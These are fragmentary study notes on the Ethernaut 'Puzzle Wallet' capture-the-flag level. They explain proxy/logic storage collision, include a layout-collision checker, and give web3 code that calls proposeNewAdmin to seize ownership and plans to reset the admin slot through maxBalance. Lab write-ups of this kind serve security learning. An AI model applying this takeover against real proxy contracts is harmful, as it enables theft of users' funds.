To do so, they voted and assigned two people with special roles in the system:
The vulnerability here arises due to storage collision between the proxy contract (PuzzleProxy) and the logic contract (PuzzleWallet). And storage collision is a nightmare when using delegatecall.
So it was already happening before the delegate anyway, then?
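A layout check that surfaces this kind of collision before deployment, as an added example that is not part of the original notes: it compares the state variables of a proxy and its logic contract slot by slot and reports every overlap where the two contracts disagree on what the slot holds. The layouts are constructed by hand from the level's PuzzleProxy and PuzzleWallet declarations, simplified from the shape of solc's storageLayout output (slots as numbers); `SIZES`, `overlaps` and `findCollisions` are hypothetical helper names.

```javascript
// Constructed sample layouts (label / slot / byte offset / type).
const proxyLayout = [
  { label: 'pendingAdmin', slot: 0, offset: 0, type: 't_address' },
  { label: 'admin',        slot: 1, offset: 0, type: 't_address' },
];
const logicLayout = [
  { label: 'owner',       slot: 0, offset: 0, type: 't_address' },
  { label: 'maxBalance',  slot: 1, offset: 0, type: 't_uint256' },
  { label: 'whitelisted', slot: 2, offset: 0, type: 't_mapping(t_address,t_bool)' },
  { label: 'balances',    slot: 3, offset: 0, type: 't_mapping(t_address,t_uint256)' },
];

// Byte widths of the value types used here (assumption: anything not
// listed, such as a mapping, is treated as occupying the whole slot).
const SIZES = { t_address: 20, t_uint256: 32, t_bool: 1 };
const width = (v) => SIZES[v.type] ?? 32;

// Two variables collide when they share a slot and their byte ranges overlap.
function overlaps(a, b) {
  return a.slot === b.slot &&
    a.offset < b.offset + width(b) &&
    b.offset < a.offset + width(a);
}

// Returns one finding per overlapping pair whose name or type differs.
function findCollisions(proxy, logic) {
  const findings = [];
  for (const p of proxy) {
    for (const l of logic) {
      if (!overlaps(p, l)) continue;
      if (p.label === l.label && p.type === l.type) continue; // same variable
      findings.push({
        slot: p.slot,
        proxy: `${p.label}:${p.type}`,
        logic: `${l.label}:${l.type}`,
        typeMismatch: p.type !== l.type,
      });
    }
  }
  return findings;
}

console.table(findCollisions(proxyLayout, logicLayout));
```

Both findings matter for review: slot 0 lets a write to one contract's variable change who the other contract treats as privileged, and slot 1 additionally reinterprets a uint256 as an address.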
Although the contract instance provided through the web3js API doesn't expose the proposeNewAdmin method, we can always encode the signature of a function call and send a transaction to the contract:
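// ABI description of the function that the contract object does not expose
const functionJson = {
  name: 'proposeNewAdmin',
  type: 'function',
  inputs: [
    {
      type: 'address', // argument type
      name: '_newAdmin' // argument name
    }
  ]
};
const params = [player]; // to change the owner to player
// Encode the 4-byte function selector followed by the ABI-encoded arguments
const data = web3.eth.abi.encodeFunctionCall(functionJson, params);
await web3.eth.sendTransaction({ from: player, to: instance, data });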
// Reference: general form of the call
web3.eth.abi.encodeFunctionCall(jsonInterface, parameters);

// Reference: encoding a call with two arguments
web3.eth.abi.encodeFunctionCall({
  name: 'myMethod',
  type: 'function',
  inputs: [{
    type: 'uint256',
    name: 'myNumber'
  }, {
    type: 'string',
    name: 'myString'
  }]
}, ['2345675643', 'Hello!%']); // arguments

// Reference: the form that takes an account password is the personal API;
// web3.eth.sendTransaction itself takes a callback as its second argument
web3.eth.personal.sendTransaction({
  from: "0xEB014f8c8B418Db6b45774c326A0E64C78914dC0",
  gasPrice: "20000000000",
  gas: "21000",
  to: '0x3535353535353535353535353535353535353535',
  value: "1000000000000000000",
  data: ""
}, 'MyPassword!').then(console.log);
> '0xda3be87732110de6c1354c83770aae630ede9ac308d9f7b399ecfba23d923384'
I want to change the admin!
maxBalance corresponds to it, so changing that is enough.
But init requires some conditions:
function setMaxBalance(uint256 _maxBalance) external onlyWhitelisted {
    require(address(this).balance == 0, "Contract balance is not 0");
    maxBalance = _maxBalance;
}
----------------------------------------------
await getBalance(contract.address)
// Output: 0.001
How to reduce the balance of the address?